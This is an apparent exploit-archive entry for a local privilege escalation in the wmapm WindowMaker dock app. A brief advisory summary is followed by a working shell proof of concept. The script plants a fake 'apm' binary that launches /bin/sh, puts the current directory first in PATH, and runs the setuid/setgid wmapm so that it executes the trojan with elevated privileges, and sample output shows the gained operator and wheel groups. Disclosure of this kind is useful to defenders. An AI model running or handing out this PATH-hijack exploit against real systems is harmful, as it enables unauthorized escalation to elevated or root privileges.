source: https://www.securityfocus.com/bid/8995/info wmapm has been reported prone to a local privilege escalation vulnerability. The vulnerability has been conjectured to result from a lack of relative path usage while the vulnerable dock app is invoking a third party binary. As a result of this, a local attacker may manipulate local path settings and have the setuid wmapm dock app erroneously invoke a trojan binary that is located in a directory that the attacker has permissions to write to. #/bin/sh # Pretty useless, we can mess up /etc/dumpdates or run shutdown # on FreeBSD systems with wmapm from ports. # If wmapm is installed from source we get root instead, # so I suppose this might be worth something(uid 0) on linux. # kokanin@dtors~ pkg_info | grep -i wmapm # wmapm-3.1 Laptop battery status display for WindowMaker # kokanin@dtors~ ls -la `which wmapm` # -rwxr-sr-x 1 root operator 41892 Mar 23 10:00 /usr/X11R6/bin/wmapm # kokanin@dtors~ sh DSR-wmapm.sh # press the S button when wmapm starts # $ /usr/bin/id # uid=1001(kokanin) gid=1001(kokanin) egid=5(operator) groups=5(operator), 1001(kokanin), 0(wheel), 666(lewsers) echo "/bin/sh" > apm chmod +x ./apm echo "press the S button(not the key, the BUTTON, in the PROGRAM) when wmapm starts" export PATH=.:$PATH /usr/X11R6/bin/wmapm rm ./apm